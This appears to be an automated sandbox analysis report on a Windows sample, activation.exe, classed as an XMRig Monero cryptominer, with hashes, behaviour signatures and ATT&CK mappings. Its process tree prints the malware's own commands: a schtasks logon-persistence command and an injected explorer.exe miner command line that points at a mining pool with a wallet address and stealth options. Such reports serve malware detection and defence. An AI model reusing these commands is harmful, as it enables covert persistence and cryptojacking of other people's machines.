Overview

overview

10

Static

static

activation.exe

windows7_x64

10

activation.exe

windows10_x64

10

Analysis

  • max time kernel
    111s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    07-05-2021 13:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    activation.exe

  • Size

    2.2MB

  • MD5

    2a8053b9d54341d3034b16e41c42885f

  • SHA1

    d7f4188ce05d608cbbe5960b01cc2429351ae607

  • SHA256

    0fb3b99e498638894f8a39cb9235108012e6820afb9f96dee7de733f7095f4ef

  • SHA512

    38de1d1901bfa0c0be33d7729700315f1506a562f19788de99460e428995de28668f45a2a6c93cd5ddd875f032de5ba4b9970006b0355a115ae63f888ac04827

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 3 IoCs
    miner
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\activation.exe
    "C:\Users\Admin\AppData\Local\Temp\activation.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:1984
    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      2⤵
      • Executes dropped EXE
      PID:1184
    • C:\Users\Admin\AppData\Roaming\smssmanagment.exe
      "C:\Users\Admin\AppData\Roaming\smssmanagment.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:536
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1736
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:1796
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=4AXqAB3xATp3qXvA883jjVbbvQtqtFoVPLy79LU8TjqiWkK71DnXYAkRsgExycBRqsJ4yBNxAFnqvNmz6KhCDv1Z622gFLs.w --pass= --cpu-max-threads-hint=50 --donate-level=0 --unam-idle-wait=3 --unam-idle-cpu=100 --tls --unam-stealth
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1632

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
    MD5

    0c0195c48b6b8582fa6f6373032118da

    SHA1

    d25340ae8e92a6d29f599fef426a2bc1b5217299

    SHA256

    11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

    SHA512

    ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    4a4526b3f3574d1573a35e64ba2c0918

    SHA1

    f4a85fed2af0c91d4e346133b5e65b415b697d7a

    SHA256

    5c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d

    SHA512

    1d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    4a4526b3f3574d1573a35e64ba2c0918

    SHA1

    f4a85fed2af0c91d4e346133b5e65b415b697d7a

    SHA256

    5c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d

    SHA512

    1d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    4a4526b3f3574d1573a35e64ba2c0918

    SHA1

    f4a85fed2af0c91d4e346133b5e65b415b697d7a

    SHA256

    5c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d

    SHA512

    1d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    4a4526b3f3574d1573a35e64ba2c0918

    SHA1

    f4a85fed2af0c91d4e346133b5e65b415b697d7a

    SHA256

    5c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d

    SHA512

    1d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab

    Download Submit
  • C:\Users\Admin\AppData\Roaming\smssmanagment.exe
    MD5

    2a8053b9d54341d3034b16e41c42885f

    SHA1

    d7f4188ce05d608cbbe5960b01cc2429351ae607

    SHA256

    0fb3b99e498638894f8a39cb9235108012e6820afb9f96dee7de733f7095f4ef

    SHA512

    38de1d1901bfa0c0be33d7729700315f1506a562f19788de99460e428995de28668f45a2a6c93cd5ddd875f032de5ba4b9970006b0355a115ae63f888ac04827

    Download Submit
  • C:\Users\Admin\AppData\Roaming\smssmanagment.exe
    MD5

    2a8053b9d54341d3034b16e41c42885f

    SHA1

    d7f4188ce05d608cbbe5960b01cc2429351ae607

    SHA256

    0fb3b99e498638894f8a39cb9235108012e6820afb9f96dee7de733f7095f4ef

    SHA512

    38de1d1901bfa0c0be33d7729700315f1506a562f19788de99460e428995de28668f45a2a6c93cd5ddd875f032de5ba4b9970006b0355a115ae63f888ac04827

    Download Submit
  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    4a4526b3f3574d1573a35e64ba2c0918

    SHA1

    f4a85fed2af0c91d4e346133b5e65b415b697d7a

    SHA256

    5c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d

    SHA512

    1d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab

    Download Submit
  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    4a4526b3f3574d1573a35e64ba2c0918

    SHA1

    f4a85fed2af0c91d4e346133b5e65b415b697d7a

    SHA256

    5c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d

    SHA512

    1d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab

    Download Submit
  • \Users\Admin\AppData\Roaming\smssmanagment.exe
    MD5

    2a8053b9d54341d3034b16e41c42885f

    SHA1

    d7f4188ce05d608cbbe5960b01cc2429351ae607

    SHA256

    0fb3b99e498638894f8a39cb9235108012e6820afb9f96dee7de733f7095f4ef

    SHA512

    38de1d1901bfa0c0be33d7729700315f1506a562f19788de99460e428995de28668f45a2a6c93cd5ddd875f032de5ba4b9970006b0355a115ae63f888ac04827

    Download Submit
  • memory/536-77-0x0000000000000000-mapping.dmp
    Download
  • memory/1184-79-0x000000001BB00000-0x000000001BB02000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1184-66-0x0000000000000000-mapping.dmp
    Download
  • memory/1184-71-0x0000000000B90000-0x0000000000B91000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1500-70-0x0000000000000000-mapping.dmp
    Download
  • memory/1500-75-0x000000013FDA0000-0x000000013FDA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1500-89-0x00000000009A0000-0x00000000009AA000-memory.dmp
    Filesize

    40KB

    Download
  • memory/1500-80-0x000000001D6A0000-0x000000001D6A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1632-91-0x00000001402D33E4-mapping.dmp
    Download
  • memory/1632-90-0x0000000140000000-0x0000000140739000-memory.dmp
    Filesize

    7.2MB

    Download
  • memory/1632-95-0x0000000001F60000-0x0000000001F80000-memory.dmp
    Filesize

    128KB

    Download
  • memory/1632-96-0x0000000001F80000-0x0000000001FA0000-memory.dmp
    Filesize

    128KB

    Download
  • memory/1632-94-0x0000000001F60000-0x0000000001F80000-memory.dmp
    Filesize

    128KB

    Download
  • memory/1632-93-0x0000000140000000-0x0000000140739000-memory.dmp
    Filesize

    7.2MB

    Download
  • memory/1632-92-0x0000000000070000-0x0000000000084000-memory.dmp
    Filesize

    80KB

    Download
  • memory/1684-60-0x000000013FCC0000-0x000000013FCC1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1684-64-0x000000001BCF0000-0x000000001BCF2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1736-78-0x0000000000000000-mapping.dmp
    Download
  • memory/1796-82-0x0000000000000000-mapping.dmp
    Download
  • memory/1796-88-0x000000001AD50000-0x000000001AD52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1796-86-0x00000000009C0000-0x00000000009C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1984-63-0x0000000000000000-mapping.dmp
    Download
  • memory/2020-62-0x0000000000000000-mapping.dmp
    Download